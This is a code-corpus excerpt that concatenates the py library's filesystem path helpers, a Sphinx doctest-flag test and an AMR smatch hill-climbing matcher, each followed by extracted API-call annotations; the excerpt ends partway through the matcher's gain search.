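#                              item_categories=item_categories)
#   for trans in sim.simulate(end_time=365.0):
#       print(trans.transaction_id(), trans.purchased_items)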
|
[
"random.normalvariate",
"markovmodel.MarkovModelBuilder",
"random.choice",
"random.random",
"samplers.RouletteWheelSampler"
] |
[((1056, 1083), 'random.choice', 'random.choice', (['[0.25, 0.75]'], {}), '([0.25, 0.75])\n', (1069, 1083), False, 'import random\n'), ((1698, 1718), 'markovmodel.MarkovModelBuilder', 'MarkovModelBuilder', ([], {}), '()\n', (1716, 1718), False, 'from markovmodel import MarkovModelBuilder\n'), ((4395, 4439), 'samplers.RouletteWheelSampler', 'RouletteWheelSampler', (['category_probabilities'], {}), '(category_probabilities)\n', (4415, 4439), False, 'from samplers import RouletteWheelSampler\n'), ((771, 798), 'random.choice', 'random.choice', (['[0.15, 0.85]'], {}), '([0.15, 0.85])\n', (784, 798), False, 'import random\n'), ((910, 937), 'random.choice', 'random.choice', (['[0.15, 0.85]'], {}), '([0.15, 0.85])\n', (923, 937), False, 'import random\n'), ((6005, 6020), 'random.random', 'random.random', ([], {}), '()\n', (6018, 6020), False, 'import random\n'), ((1135, 1165), 'random.normalvariate', 'random.normalvariate', (['avg', '(0.1)'], {}), '(avg, 0.1)\n', (1155, 1165), False, 'import random\n'), ((859, 889), 'random.normalvariate', 'random.normalvariate', (['avg', '(0.1)'], {}), '(avg, 0.1)\n', (879, 889), False, 'import random\n'), ((1009, 1039), 'random.normalvariate', 'random.normalvariate', (['avg', '(0.1)'], {}), '(avg, 0.1)\n', (1029, 1039), False, 'import random\n'), ((7127, 7153), 'random.choice', 'random.choice', (['self.stores'], {}), '(self.stores)\n', (7140, 7153), False, 'import random\n')]
|
"""
"""
import os, sys, posixpath
import py
# Moved from local.py.
iswin32 = sys.platform == "win32" or (getattr(os, '_name', False) == 'nt')
class Checkers:
_depend_on_existence = 'exists', 'link', 'dir', 'file'
def __init__(self, path):
self.path = path
def dir(self):
raise NotImplementedError
def file(self):
raise NotImplementedError
def dotfile(self):
return self.path.basename.startswith('.')
def ext(self, arg):
if not arg.startswith('.'):
arg = '.' + arg
return self.path.ext == arg
def exists(self):
raise NotImplementedError
def basename(self, arg):
return self.path.basename == arg
def basestarts(self, arg):
return self.path.basename.startswith(arg)
def relto(self, arg):
return self.path.relto(arg)
def fnmatch(self, arg):
return self.path.fnmatch(arg)
def endswith(self, arg):
return str(self.path).endswith(arg)
def _evaluate(self, kw):
for name, value in kw.items():
invert = False
meth = None
try:
meth = getattr(self, name)
except AttributeError:
if name[:3] == 'not':
invert = True
try:
meth = getattr(self, name[3:])
except AttributeError:
pass
if meth is None:
raise TypeError(
"no %r checker available for %r" % (name, self.path))
try:
if py.code.getrawcode(meth).co_argcount > 1:
if (not meth(value)) ^ invert:
return False
else:
if bool(value) ^ bool(meth()) ^ invert:
return False
except (py.error.ENOENT, py.error.ENOTDIR, py.error.EBUSY):
# EBUSY feels not entirely correct,
# but its kind of necessary since ENOMEDIUM
# is not accessible in python
for name in self._depend_on_existence:
if name in kw:
if kw.get(name):
return False
name = 'not' + name
if name in kw:
if not kw.get(name):
return False
return True
class NeverRaised(Exception):
pass
class PathBase(object):
""" shared implementation for filesystem path objects."""
Checkers = Checkers
def __div__(self, other):
return self.join(str(other))
__truediv__ = __div__ # py3k
def basename(self):
""" basename part of path. """
return self._getbyspec('basename')[0]
basename = property(basename, None, None, basename.__doc__)
def dirname(self):
""" dirname part of path. """
return self._getbyspec('dirname')[0]
dirname = property(dirname, None, None, dirname.__doc__)
def purebasename(self):
""" pure base name of the path."""
return self._getbyspec('purebasename')[0]
purebasename = property(purebasename, None, None, purebasename.__doc__)
def ext(self):
""" extension of the path (including the '.')."""
return self._getbyspec('ext')[0]
ext = property(ext, None, None, ext.__doc__)
def dirpath(self, *args, **kwargs):
""" return the directory Path of the current Path joined
with any given path arguments.
"""
return self.new(basename='').join(*args, **kwargs)
def read_binary(self):
""" read and return a bytestring from reading the path. """
with self.open('rb') as f:
return f.read()
def read_text(self, encoding):
""" read and return a Unicode string from reading the path. """
with self.open("r", encoding=encoding) as f:
return f.read()
def read(self, mode='r'):
""" read and return a bytestring from reading the path. """
with self.open(mode) as f:
return f.read()
def readlines(self, cr=1):
""" read and return a list of lines from the path. if cr is False, the
newline will be removed from the end of each line. """
if not cr:
content = self.read('rU')
return content.split('\n')
else:
f = self.open('rU')
try:
return f.readlines()
finally:
f.close()
def load(self):
""" (deprecated) return object unpickled from self.read() """
f = self.open('rb')
try:
return py.error.checked_call(py.std.pickle.load, f)
finally:
f.close()
def move(self, target):
""" move this path to target. """
if target.relto(self):
raise py.error.EINVAL(target,
"cannot move path into a subdirectory of itself")
try:
self.rename(target)
except py.error.EXDEV: # invalid cross-device link
self.copy(target)
self.remove()
def __repr__(self):
""" return a string representation of this path. """
return repr(str(self))
def check(self, **kw):
""" check a path for existence and properties.
Without arguments, return True if the path exists, otherwise False.
valid checkers::
file=1 # is a file
file=0 # is not a file (may not even exist)
dir=1 # is a dir
link=1 # is a link
exists=1 # exists
You can specify multiple checker definitions, for example::
path.check(file=1, link=1) # a link pointing to a file
"""
if not kw:
kw = {'exists' : 1}
return self.Checkers(self)._evaluate(kw)
def fnmatch(self, pattern):
"""return true if the basename/fullname matches the glob-'pattern'.
valid pattern characters::
* matches everything
? matches any single character
[seq] matches any character in seq
[!seq] matches any char not in seq
If the pattern contains a path-separator then the full path
is used for pattern matching and a '*' is prepended to the
pattern.
if the pattern doesn't contain a path-separator the pattern
is only matched against the basename.
"""
return FNMatcher(pattern)(self)
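    # Illustrative behaviour (assuming a concrete path type such as
    # py.path.local):
    #   local("/tmp/pkg/mod.py").fnmatch("*.py")     -> True  (basename match)
    #   local("/tmp/pkg/mod.py").fnmatch("pkg/*.py") -> True  (full-path match)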
def relto(self, relpath):
""" return a string which is the relative part of the path
to the given 'relpath'.
"""
if not isinstance(relpath, (str, PathBase)):
raise TypeError("%r: not a string or path object" %(relpath,))
strrelpath = str(relpath)
if strrelpath and strrelpath[-1] != self.sep:
strrelpath += self.sep
#assert strrelpath[-1] == self.sep
#assert strrelpath[-2] != self.sep
strself = str(self)
if sys.platform == "win32" or getattr(os, '_name', None) == 'nt':
if os.path.normcase(strself).startswith(
os.path.normcase(strrelpath)):
return strself[len(strrelpath):]
elif strself.startswith(strrelpath):
return strself[len(strrelpath):]
return ""
def ensure_dir(self, *args):
""" ensure the path joined with args is a directory. """
return self.ensure(*args, **{"dir": True})
def bestrelpath(self, dest):
""" return a string which is a relative path from self
(assumed to be a directory) to dest such that
self.join(bestrelpath) == dest and if not such
path can be determined return dest.
"""
try:
if self == dest:
return os.curdir
base = self.common(dest)
if not base: # can be the case on windows
return str(dest)
self2base = self.relto(base)
reldest = dest.relto(base)
if self2base:
n = self2base.count(self.sep) + 1
else:
n = 0
l = [os.pardir] * n
if reldest:
l.append(reldest)
target = dest.sep.join(l)
return target
except AttributeError:
return str(dest)
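    # Worked example: for self = /a/b and dest = /a/c the common base is /a,
    # self2base is "b" (one separator-free component, so n = 1), and the
    # result is os.pardir joined with "c", i.e. "../c".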
def exists(self):
return self.check()
def isdir(self):
return self.check(dir=1)
def isfile(self):
return self.check(file=1)
def parts(self, reverse=False):
""" return a root-first list of all ancestor directories
plus the path itself.
"""
current = self
l = [self]
while 1:
last = current
current = current.dirpath()
if last == current:
break
l.append(current)
if not reverse:
l.reverse()
return l
def common(self, other):
""" return the common part shared with the other path
or None if there is no common part.
"""
last = None
for x, y in zip(self.parts(), other.parts()):
if x != y:
return last
last = x
return last
def __add__(self, other):
""" return new path object with 'other' added to the basename"""
return self.new(basename=self.basename+str(other))
def __cmp__(self, other):
""" return sort value (-1, 0, +1). """
try:
return cmp(self.strpath, other.strpath)
except AttributeError:
return cmp(str(self), str(other)) # self.path, other.path)
def __lt__(self, other):
try:
return self.strpath < other.strpath
except AttributeError:
return str(self) < str(other)
def visit(self, fil=None, rec=None, ignore=NeverRaised, bf=False, sort=False):
""" yields all paths below the current one
fil is a filter (glob pattern or callable), if not matching the
path will not be yielded, defaulting to None (everything is
returned)
rec is a filter (glob pattern or callable) that controls whether
a node is descended, defaulting to None
        ignore is an Exception class that is ignored when calling listdir()
on any of the paths (by default, all exceptions are reported)
bf if True will cause a breadthfirst search instead of the
default depthfirst. Default: False
sort if True will sort entries within each directory level.
"""
for x in Visitor(fil, rec, ignore, bf, sort).gen(self):
yield x
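    # Typical use (hedged sketch): yield every .py file below `path`, while
    # only descending into non-hidden directories:
    #   for p in path.visit(fil="*.py", rec="[!.]*", sort=True):
    #       process(p)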
def _sortlist(self, res, sort):
if sort:
if hasattr(sort, '__call__'):
res.sort(sort)
else:
res.sort()
def samefile(self, other):
""" return True if other refers to the same stat object as self. """
return self.strpath == str(other)
class Visitor:
def __init__(self, fil, rec, ignore, bf, sort):
if isinstance(fil, str):
fil = FNMatcher(fil)
if isinstance(rec, str):
self.rec = FNMatcher(rec)
elif not hasattr(rec, '__call__') and rec:
self.rec = lambda path: True
else:
self.rec = rec
self.fil = fil
self.ignore = ignore
self.breadthfirst = bf
self.optsort = sort and sorted or (lambda x: x)
def gen(self, path):
try:
entries = path.listdir()
except self.ignore:
return
rec = self.rec
dirs = self.optsort([p for p in entries
if p.check(dir=1) and (rec is None or rec(p))])
if not self.breadthfirst:
for subdir in dirs:
for p in self.gen(subdir):
yield p
for p in self.optsort(entries):
if self.fil is None or self.fil(p):
yield p
if self.breadthfirst:
for subdir in dirs:
for p in self.gen(subdir):
yield p
class FNMatcher:
def __init__(self, pattern):
self.pattern = pattern
def __call__(self, path):
pattern = self.pattern
if (pattern.find(path.sep) == -1 and
iswin32 and
pattern.find(posixpath.sep) != -1):
# Running on Windows, the pattern has no Windows path separators,
# and the pattern has one or more Posix path separators. Replace
# the Posix path separators with the Windows path separator.
pattern = pattern.replace(posixpath.sep, path.sep)
if pattern.find(path.sep) == -1:
name = path.basename
else:
name = str(path) # path.strpath # XXX svn?
if not os.path.isabs(pattern):
pattern = '*' + path.sep + pattern
return py.std.fnmatch.fnmatch(name, pattern)
|
[
"os.path.isabs",
"py.code.getrawcode",
"py.std.fnmatch.fnmatch",
"py.error.EINVAL",
"py.error.checked_call",
"os.path.normcase"
] |
[((13045, 13082), 'py.std.fnmatch.fnmatch', 'py.std.fnmatch.fnmatch', (['name', 'pattern'], {}), '(name, pattern)\n', (13067, 13082), False, 'import py\n'), ((4691, 4735), 'py.error.checked_call', 'py.error.checked_call', (['py.std.pickle.load', 'f'], {}), '(py.std.pickle.load, f)\n', (4712, 4735), False, 'import py\n'), ((4895, 4968), 'py.error.EINVAL', 'py.error.EINVAL', (['target', '"""cannot move path into a subdirectory of itself"""'], {}), "(target, 'cannot move path into a subdirectory of itself')\n", (4910, 4968), False, 'import py\n'), ((7227, 7255), 'os.path.normcase', 'os.path.normcase', (['strrelpath'], {}), '(strrelpath)\n', (7243, 7255), False, 'import os, sys, posixpath\n'), ((12955, 12977), 'os.path.isabs', 'os.path.isabs', (['pattern'], {}), '(pattern)\n', (12968, 12977), False, 'import os, sys, posixpath\n'), ((7174, 7199), 'os.path.normcase', 'os.path.normcase', (['strself'], {}), '(strself)\n', (7190, 7199), False, 'import os, sys, posixpath\n'), ((1608, 1632), 'py.code.getrawcode', 'py.code.getrawcode', (['meth'], {}), '(meth)\n', (1626, 1632), False, 'import py\n')]
|
"""
test_transforms_post_transforms_code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: Copyright 2007-2020 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import pytest
@pytest.mark.sphinx('html', testroot='trim_doctest_flags')
def test_trim_doctest_flags_html(app, status, warning):
app.build()
result = (app.outdir / 'index.html').read_text()
assert 'FOO' not in result
assert 'BAR' in result
assert 'BAZ' not in result
assert 'QUX' not in result
assert 'QUUX' not in result
@pytest.mark.sphinx('latex', testroot='trim_doctest_flags')
def test_trim_doctest_flags_latex(app, status, warning):
app.build()
result = (app.outdir / 'python.tex').read_text()
assert 'FOO' not in result
assert 'BAR' in result
assert 'BAZ' not in result
assert 'QUX' not in result
assert 'QUUX' not in result
|
[
"pytest.mark.sphinx"
] |
[((222, 279), 'pytest.mark.sphinx', 'pytest.mark.sphinx', (['"""html"""'], {'testroot': '"""trim_doctest_flags"""'}), "('html', testroot='trim_doctest_flags')\n", (240, 279), False, 'import pytest\n'), ((561, 619), 'pytest.mark.sphinx', 'pytest.mark.sphinx', (['"""latex"""'], {'testroot': '"""trim_doctest_flags"""'}), "('latex', testroot='trim_doctest_flags')\n", (579, 619), False, 'import pytest\n')]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Adapted from the amrlib smatch file; used for approximating the largest common subgraph between two AMRs.
import re
import random
import amr
import sys
import penman
from penman.models.noop import NoOpModel
# total number of iterations in the smatch computation
iteration_num = 5
# verbose output switch.
# Default false (no verbose output)
verbose = False
veryVerbose = False
# single score output switch.
# Default true (compute a single score for all AMRs in two files)
single_score = True
# precision and recall output switch.
# Default false (do not output precision and recall, just output F score)
pr_flag = False
# Error log location
ERROR_LOG = sys.stderr
# Debug log location
DEBUG_LOG = sys.stderr
# dictionary to save pre-computed node mapping and its resulting triple match count
# key: tuples of node mapping
# value: the matching triple count
match_triple_dict = {}
def get_best_match(instance1, attribute1, relation1,
instance2, attribute2, relation2,
prefix1, prefix2, doinstance=True, doattribute=True, dorelation=True):
"""
Get the highest triple match number between two sets of triples via hill-climbing.
Arguments:
instance1: instance triples of AMR 1 ("instance", node name, node value)
attribute1: attribute triples of AMR 1 (attribute name, node name, attribute value)
relation1: relation triples of AMR 1 (relation name, node 1 name, node 2 name)
instance2: instance triples of AMR 2 ("instance", node name, node value)
attribute2: attribute triples of AMR 2 (attribute name, node name, attribute value)
relation2: relation triples of AMR 2 (relation name, node 1 name, node 2 name)
prefix1: prefix label for AMR 1
prefix2: prefix label for AMR 2
Returns:
best_match: the node mapping that results in the highest triple matching number
best_match_num: the highest triple matching number
"""
# Compute candidate pool - all possible node match candidates.
# In the hill-climbing, we only consider candidate in this pool to save computing time.
# weight_dict is a dictionary that maps a pair of node
(candidate_mappings, weight_dict) = compute_pool(instance1, attribute1, relation1,
instance2, attribute2, relation2,
prefix1, prefix2, doinstance=doinstance, doattribute=doattribute,
dorelation=dorelation)
if veryVerbose:
print("Candidate mappings:", file=DEBUG_LOG)
print(candidate_mappings, file=DEBUG_LOG)
print("Weight dictionary", file=DEBUG_LOG)
print(weight_dict, file=DEBUG_LOG)
best_match_num = 0
# initialize best match mapping
# the ith entry is the node index in AMR 2 which maps to the ith node in AMR 1
best_mapping = [-1] * len(instance1)
for i in range(iteration_num):
if veryVerbose:
print("Iteration", i, file=DEBUG_LOG)
if i == 0:
# smart initialization used for the first round
cur_mapping = smart_init_mapping(candidate_mappings, instance1, instance2)
else:
# random initialization for the other round
cur_mapping = random_init_mapping(candidate_mappings)
# compute current triple match number
match_num = compute_match(cur_mapping, weight_dict)
if veryVerbose:
print("Node mapping at start", cur_mapping, file=DEBUG_LOG)
print("Triple match number at start:", match_num, file=DEBUG_LOG)
while True:
# get best gain
(gain, new_mapping) = get_best_gain(cur_mapping, candidate_mappings, weight_dict,
len(instance2), match_num)
if veryVerbose:
print("Gain after the hill-climbing", gain, file=DEBUG_LOG)
# hill-climbing until there will be no gain for new node mapping
if gain <= 0:
break
# otherwise update match_num and mapping
match_num += gain
cur_mapping = new_mapping[:]
if veryVerbose:
print("Update triple match number to:", match_num, file=DEBUG_LOG)
print("Current mapping:", cur_mapping, file=DEBUG_LOG)
if match_num > best_match_num:
best_mapping = cur_mapping[:]
best_match_num = match_num
return best_mapping, best_match_num
def rename_node(amr, prefix):
"""
Rename AMR graph nodes to prefix + node_index to avoid nodes with the same name in two different AMRs.
"""
node_map_dict = {}
inverse_node_map_dict = {}
# map each node to its new name (e.g. "a1")
for i in range(0, len(amr.nodes)):
node_map_dict[amr.nodes[i]] = prefix + str(i)
# update node name
for i, v in enumerate(amr.nodes):
amr.nodes[i] = node_map_dict[v]
# update node name in relations
for node_relations in amr.relations:
for i, l in enumerate(node_relations):
node_relations[i][1] = node_map_dict[l[1]]
for k,v in node_map_dict.items():
inverse_node_map_dict[v] = k
return inverse_node_map_dict
def normalize(item):
"""
lowercase and remove quote signifiers from items that are about to be compared
"""
return item.lower().rstrip('_')
def compute_pool(instance1, attribute1, relation1,
instance2, attribute2, relation2,
prefix1, prefix2, doinstance=True, doattribute=True, dorelation=True):
"""
compute all possible node mapping candidates and their weights (the triple matching number gain resulting from
mapping one node in AMR 1 to another node in AMR2)
Arguments:
instance1: instance triples of AMR 1
attribute1: attribute triples of AMR 1 (attribute name, node name, attribute value)
relation1: relation triples of AMR 1 (relation name, node 1 name, node 2 name)
instance2: instance triples of AMR 2
attribute2: attribute triples of AMR 2 (attribute name, node name, attribute value)
        relation2: relation triples of AMR 2 (relation name, node 1 name, node 2 name)
prefix1: prefix label for AMR 1
prefix2: prefix label for AMR 2
Returns:
candidate_mapping: a list of candidate nodes.
The ith element contains the node indices (in AMR 2) the ith node (in AMR 1) can map to.
(resulting in non-zero triple match)
weight_dict: a dictionary which contains the matching triple number for every pair of node mapping. The key
is a node pair. The value is another dictionary. key {-1} is triple match resulting from this node
pair alone (instance triples and attribute triples), and other keys are node pairs that can result
in relation triple match together with the first node pair.
"""
candidate_mapping = []
weight_dict = {}
for instance1_item in instance1:
# each candidate mapping is a set of node indices
candidate_mapping.append(set())
if doinstance:
for instance2_item in instance2:
# if both triples are instance triples and have the same value
if normalize(instance1_item[0]) == normalize(instance2_item[0]) and \
normalize(instance1_item[2]) == normalize(instance2_item[2]):
# get node index by stripping the prefix
node1_index = int(instance1_item[1][len(prefix1):])
node2_index = int(instance2_item[1][len(prefix2):])
candidate_mapping[node1_index].add(node2_index)
node_pair = (node1_index, node2_index)
# use -1 as key in weight_dict for instance triples and attribute triples
if node_pair in weight_dict:
weight_dict[node_pair][-1] += 1
else:
weight_dict[node_pair] = {}
weight_dict[node_pair][-1] = 1
if doattribute:
for attribute1_item in attribute1:
for attribute2_item in attribute2:
# if both attribute relation triple have the same relation name and value
if normalize(attribute1_item[0]) == normalize(attribute2_item[0]) \
and normalize(attribute1_item[2]) == normalize(attribute2_item[2]):
node1_index = int(attribute1_item[1][len(prefix1):])
node2_index = int(attribute2_item[1][len(prefix2):])
candidate_mapping[node1_index].add(node2_index)
node_pair = (node1_index, node2_index)
# use -1 as key in weight_dict for instance triples and attribute triples
if node_pair in weight_dict:
weight_dict[node_pair][-1] += 1
else:
weight_dict[node_pair] = {}
weight_dict[node_pair][-1] = 1
if dorelation:
for relation1_item in relation1:
for relation2_item in relation2:
# if both relation share the same name
if normalize(relation1_item[0]) == normalize(relation2_item[0]):
node1_index_amr1 = int(relation1_item[1][len(prefix1):])
node1_index_amr2 = int(relation2_item[1][len(prefix2):])
node2_index_amr1 = int(relation1_item[2][len(prefix1):])
node2_index_amr2 = int(relation2_item[2][len(prefix2):])
# add mapping between two nodes
candidate_mapping[node1_index_amr1].add(node1_index_amr2)
candidate_mapping[node2_index_amr1].add(node2_index_amr2)
node_pair1 = (node1_index_amr1, node1_index_amr2)
node_pair2 = (node2_index_amr1, node2_index_amr2)
if node_pair2 != node_pair1:
# update weight_dict weight. Note that we need to update both entries for future search
# i.e weight_dict[node_pair1][node_pair2]
# weight_dict[node_pair2][node_pair1]
if node1_index_amr1 > node2_index_amr1:
# swap node_pair1 and node_pair2
node_pair1 = (node2_index_amr1, node2_index_amr2)
node_pair2 = (node1_index_amr1, node1_index_amr2)
if node_pair1 in weight_dict:
if node_pair2 in weight_dict[node_pair1]:
weight_dict[node_pair1][node_pair2] += 1
else:
weight_dict[node_pair1][node_pair2] = 1
else:
weight_dict[node_pair1] = {-1: 0, node_pair2: 1}
if node_pair2 in weight_dict:
if node_pair1 in weight_dict[node_pair2]:
weight_dict[node_pair2][node_pair1] += 1
else:
weight_dict[node_pair2][node_pair1] = 1
else:
weight_dict[node_pair2] = {-1: 0, node_pair1: 1}
else:
# two node pairs are the same. So we only update weight_dict once.
# this generally should not happen.
if node_pair1 in weight_dict:
weight_dict[node_pair1][-1] += 1
else:
weight_dict[node_pair1] = {-1: 1}
return candidate_mapping, weight_dict
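# Shape of the returned weight_dict (illustrative values): each node-pair key
# maps to a dict with key -1 for instance/attribute matches gained by that
# pair alone, plus other node-pair keys for joint relation matches, e.g.
#   weight_dict[(0, 1)] == {-1: 1, (2, 3): 1}
# means mapping node 0 -> 1 alone matches one triple, and one more relation
# triple matches if node 2 -> 3 is also in the mapping.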
def smart_init_mapping(candidate_mapping, instance1, instance2):
"""
Initialize mapping based on the concept mapping (smart initialization)
Arguments:
candidate_mapping: candidate node match list
instance1: instance triples of AMR 1
instance2: instance triples of AMR 2
Returns:
initialized node mapping between two AMRs
"""
random.seed()
matched_dict = {}
result = []
# list to store node indices that have no concept match
no_word_match = []
for i, candidates in enumerate(candidate_mapping):
if not candidates:
# no possible mapping
result.append(-1)
continue
# node value in instance triples of AMR 1
value1 = instance1[i][2]
for node_index in candidates:
value2 = instance2[node_index][2]
# find the first instance triple match in the candidates
# instance triple match is having the same concept value
if value1 == value2:
if node_index not in matched_dict:
result.append(node_index)
matched_dict[node_index] = 1
break
if len(result) == i:
no_word_match.append(i)
result.append(-1)
# if no concept match, generate a random mapping
for i in no_word_match:
candidates = list(candidate_mapping[i])
while candidates:
# get a random node index from candidates
rid = random.randint(0, len(candidates) - 1)
candidate = candidates[rid]
if candidate in matched_dict:
candidates.pop(rid)
else:
matched_dict[candidate] = 1
result[i] = candidate
break
return result
def random_init_mapping(candidate_mapping):
"""
Generate a random node mapping.
Args:
candidate_mapping: candidate_mapping: candidate node match list
Returns:
randomly-generated node mapping between two AMRs
"""
# if needed, a fixed seed could be passed here to generate same random (to help debugging)
random.seed()
matched_dict = {}
result = []
for c in candidate_mapping:
candidates = list(c)
if not candidates:
# -1 indicates no possible mapping
result.append(-1)
continue
found = False
while candidates:
# randomly generate an index in [0, length of candidates)
rid = random.randint(0, len(candidates) - 1)
candidate = candidates[rid]
# check if it has already been matched
if candidate in matched_dict:
candidates.pop(rid)
else:
matched_dict[candidate] = 1
result.append(candidate)
found = True
break
if not found:
result.append(-1)
return result
def compute_match(mapping, weight_dict):
"""
Given a node mapping, compute match number based on weight_dict.
Args:
        mapping: a list of node indices in AMR 2. The ith element (value j) means node i in AMR 1 maps to node j in AMR 2.
Returns:
matching triple number
Complexity: O(m*n) , m is the node number of AMR 1, n is the node number of AMR 2
"""
# If this mapping has been investigated before, retrieve the value instead of re-computing.
if veryVerbose:
print("Computing match for mapping", file=DEBUG_LOG)
print(mapping, file=DEBUG_LOG)
if tuple(mapping) in match_triple_dict:
if veryVerbose:
print("saved value", match_triple_dict[tuple(mapping)], file=DEBUG_LOG)
return match_triple_dict[tuple(mapping)]
match_num = 0
# i is node index in AMR 1, m is node index in AMR 2
for i, m in enumerate(mapping):
if m == -1:
# no node maps to this node
continue
# node i in AMR 1 maps to node m in AMR 2
current_node_pair = (i, m)
if current_node_pair not in weight_dict:
continue
if veryVerbose:
print("node_pair", current_node_pair, file=DEBUG_LOG)
for key in weight_dict[current_node_pair]:
if key == -1:
# matching triple resulting from instance/attribute triples
match_num += weight_dict[current_node_pair][key]
if veryVerbose:
print("instance/attribute match", weight_dict[current_node_pair][key], file=DEBUG_LOG)
# only consider node index larger than i to avoid duplicates
# as we store both weight_dict[node_pair1][node_pair2] and
# weight_dict[node_pair2][node_pair1] for a relation
elif key[0] < i:
continue
elif mapping[key[0]] == key[1]:
match_num += weight_dict[current_node_pair][key]
if veryVerbose:
print("relation match with", key, weight_dict[current_node_pair][key], file=DEBUG_LOG)
if veryVerbose:
print("match computing complete, result:", match_num, file=DEBUG_LOG)
# update match_triple_dict
match_triple_dict[tuple(mapping)] = match_num
return match_num
def move_gain(mapping, node_id, old_id, new_id, weight_dict, match_num):
"""
Compute the triple match number gain from the move operation
Arguments:
mapping: current node mapping
node_id: remapped node in AMR 1
old_id: original node id in AMR 2 to which node_id is mapped
new_id: new node in to which node_id is mapped
weight_dict: weight dictionary
match_num: the original triple matching number
Returns:
the triple match gain number (might be negative)
"""
# new node mapping after moving
new_mapping = (node_id, new_id)
# node mapping before moving
old_mapping = (node_id, old_id)
# new nodes mapping list (all node pairs)
new_mapping_list = mapping[:]
new_mapping_list[node_id] = new_id
# if this mapping is already been investigated, use saved one to avoid duplicate computing
if tuple(new_mapping_list) in match_triple_dict:
return match_triple_dict[tuple(new_mapping_list)] - match_num
gain = 0
# add the triple match incurred by new_mapping to gain
if new_mapping in weight_dict:
for key in weight_dict[new_mapping]:
if key == -1:
# instance/attribute triple match
gain += weight_dict[new_mapping][-1]
elif new_mapping_list[key[0]] == key[1]:
# relation gain incurred by new_mapping and another node pair in new_mapping_list
gain += weight_dict[new_mapping][key]
# deduct the triple match incurred by old_mapping from gain
if old_mapping in weight_dict:
for k in weight_dict[old_mapping]:
if k == -1:
gain -= weight_dict[old_mapping][-1]
elif mapping[k[0]] == k[1]:
gain -= weight_dict[old_mapping][k]
# update match number dictionary
match_triple_dict[tuple(new_mapping_list)] = match_num + gain
return gain
def swap_gain(mapping, node_id1, mapping_id1, node_id2, mapping_id2, weight_dict, match_num):
"""
Compute the triple match number gain from the swapping
Arguments:
mapping: current node mapping list
node_id1: node 1 index in AMR 1
mapping_id1: the node index in AMR 2 node 1 maps to (in the current mapping)
node_id2: node 2 index in AMR 1
mapping_id2: the node index in AMR 2 node 2 maps to (in the current mapping)
weight_dict: weight dictionary
match_num: the original matching triple number
Returns:
the gain number (might be negative)
"""
new_mapping_list = mapping[:]
# Before swapping, node_id1 maps to mapping_id1, and node_id2 maps to mapping_id2
# After swapping, node_id1 maps to mapping_id2 and node_id2 maps to mapping_id1
new_mapping_list[node_id1] = mapping_id2
new_mapping_list[node_id2] = mapping_id1
if tuple(new_mapping_list) in match_triple_dict:
return match_triple_dict[tuple(new_mapping_list)] - match_num
gain = 0
new_mapping1 = (node_id1, mapping_id2)
new_mapping2 = (node_id2, mapping_id1)
old_mapping1 = (node_id1, mapping_id1)
old_mapping2 = (node_id2, mapping_id2)
if node_id1 > node_id2:
new_mapping2 = (node_id1, mapping_id2)
new_mapping1 = (node_id2, mapping_id1)
old_mapping1 = (node_id2, mapping_id2)
old_mapping2 = (node_id1, mapping_id1)
if new_mapping1 in weight_dict:
for key in weight_dict[new_mapping1]:
if key == -1:
gain += weight_dict[new_mapping1][-1]
elif new_mapping_list[key[0]] == key[1]:
gain += weight_dict[new_mapping1][key]
if new_mapping2 in weight_dict:
for key in weight_dict[new_mapping2]:
if key == -1:
gain += weight_dict[new_mapping2][-1]
# to avoid duplicate
elif key[0] == node_id1:
continue
elif new_mapping_list[key[0]] == key[1]:
gain += weight_dict[new_mapping2][key]
if old_mapping1 in weight_dict:
for key in weight_dict[old_mapping1]:
if key == -1:
gain -= weight_dict[old_mapping1][-1]
elif mapping[key[0]] == key[1]:
gain -= weight_dict[old_mapping1][key]
if old_mapping2 in weight_dict:
for key in weight_dict[old_mapping2]:
if key == -1:
gain -= weight_dict[old_mapping2][-1]
# to avoid duplicate
elif key[0] == node_id1:
continue
elif mapping[key[0]] == key[1]:
gain -= weight_dict[old_mapping2][key]
match_triple_dict[tuple(new_mapping_list)] = match_num + gain
return gain
def get_best_gain(mapping, candidate_mappings, weight_dict, instance_len, cur_match_num):
"""
Hill-climbing method to return the best gain swap/move can get
Arguments:
mapping: current node mapping
candidate_mappings: the candidates mapping list
weight_dict: the weight dictionary
instance_len: the number of the nodes in AMR 2
cur_match_num: current triple match number
Returns:
the best gain we can get via swap/move operation
"""
largest_gain = 0
# True: using swap; False: using move
use_swap = True
# the node to be moved/swapped
node1 = None
# store the other node affected. In swap, this other node is the node swapping with node1. In move, this other
# node is the node node1 will move to.
node2 = None
# unmatched nodes in AMR 2
unmatched = set(range(instance_len))
# exclude nodes in current mapping
# get unmatched nodes
for nid in mapping:
if nid in unmatched:
unmatched.remove(nid)
for i, nid in enumerate(mapping):
# current node i in AMR 1 maps to node nid in AMR 2
for nm in unmatched:
if nm in candidate_mappings[i]:
# remap i to another unmatched node (move)
# (i, m) -> (i, nm)
if veryVerbose:
print("Remap node", i, "from ", nid, "to", nm, file=DEBUG_LOG)
mv_gain = move_gain(mapping, i, nid, nm, weight_dict, cur_match_num)
if veryVerbose:
print("Move gain:", mv_gain, file=DEBUG_LOG)
new_mapping = mapping[:]
new_mapping[i] = nm
new_match_num = compute_match(new_mapping, weight_dict)
if new_match_num != cur_match_num + mv_gain:
print(mapping, new_mapping, file=ERROR_LOG)
print("Inconsistency in computing: move gain", cur_match_num, mv_gain, new_match_num,
file=ERROR_LOG)
if mv_gain > largest_gain:
largest_gain = mv_gain
node1 = i
node2 = nm
use_swap = False
# compute swap gain
for i, m in enumerate(mapping):
for j in range(i + 1, len(mapping)):
m2 = mapping[j]
# swap operation (i, m) (j, m2) -> (i, m2) (j, m)
# j starts from i+1, to avoid duplicate swap
if veryVerbose:
print("Swap node", i, "and", j, file=DEBUG_LOG)
print("Before swapping:", i, "-", m, ",", j, "-", m2, file=DEBUG_LOG)
print(mapping, file=DEBUG_LOG)
print("After swapping:", i, "-", m2, ",", j, "-", m, file=DEBUG_LOG)
sw_gain = swap_gain(mapping, i, m, j, m2, weight_dict, cur_match_num)
if veryVerbose:
print("Swap gain:", sw_gain, file=DEBUG_LOG)
new_mapping = mapping[:]
new_mapping[i] = m2
new_mapping[j] = m
            if veryVerbose:
                print(new_mapping, file=DEBUG_LOG)
new_match_num = compute_match(new_mapping, weight_dict)
if new_match_num != cur_match_num + sw_gain:
print(mapping, new_mapping, file=ERROR_LOG)
